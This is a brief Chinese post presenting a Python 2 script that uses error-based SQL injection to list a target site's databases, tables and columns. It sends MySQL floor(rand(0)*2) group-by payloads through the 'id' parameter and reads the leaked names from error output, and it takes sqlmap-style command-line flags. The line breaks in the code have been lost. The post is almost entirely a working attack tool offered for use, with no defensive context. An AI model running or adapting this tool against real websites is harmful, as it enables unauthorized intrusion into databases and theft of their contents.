基于报错注入的Python代码

能够爆数据库，表，和字段的基于报错注入的Python代码

import reimport sysimport requestsimport binasciidef Get_db(url):    url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+"    resp = requests.get(url_dbs_num)    html = resp.content    db_num = int(re.search(r':::(\d?):::',html).group(1))    print "Database number : %d" % db_num    for n in xrange(0,db_num):        url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n        resp = requests.get(url_dbs_table)        html = resp.content        db_name = re.search(r':::(.*?):::',html).group(1)        print db_namedef Get_table(url,db_name):    db_name = "0x" + binascii.b2a_hex(db_name)    url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name    resp = requests.get(url_tables_num)    html = resp.content    tables_num = int(re.search(r':::(\d?):::',html).group(1))    print "tables number : %d" % tables_num    for n in xrange(0,tables_num):        url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,n)        resp = requests.get(url_tablename)        html = resp.content        table_name = re.search(r":::(.*?):::",html).group(1)        print table_namedef Get_column(url,db_name,table_name):    db_name = "0x" + binascii.b2a_hex(db_name)    table_name = "0x" + binascii.b2a_hex(table_name)    url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name)    resp = requests.get(url_columns_num)    html = resp.content    columns_num = int(re.search(r":::(\d?):::",html).group(1))    print "Columns number : %d" % columns_num    for n in xrange(0,columns_num):        url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name,n)        resp = requests.get(url_columns_name)        html = resp.content        column_name = re.search(r":::(.*?):::",html).group(1)        print column_namedef main():    if sys.argv[2] == '--dbs':        Get_db(sys.argv[1])    elif sys.argv[2] == '-D' and sys.argv[4] == '--tables':        Get_table(sys.argv[1],sys.argv[3])    elif sys.argv[2] == '-D' and sys.argv[4] == '-T' and sys.argv[6] == '--columns':        Get_column(sys.argv[1],sys.argv[3],sys.argv[5])if __name__ == '__main__':    main()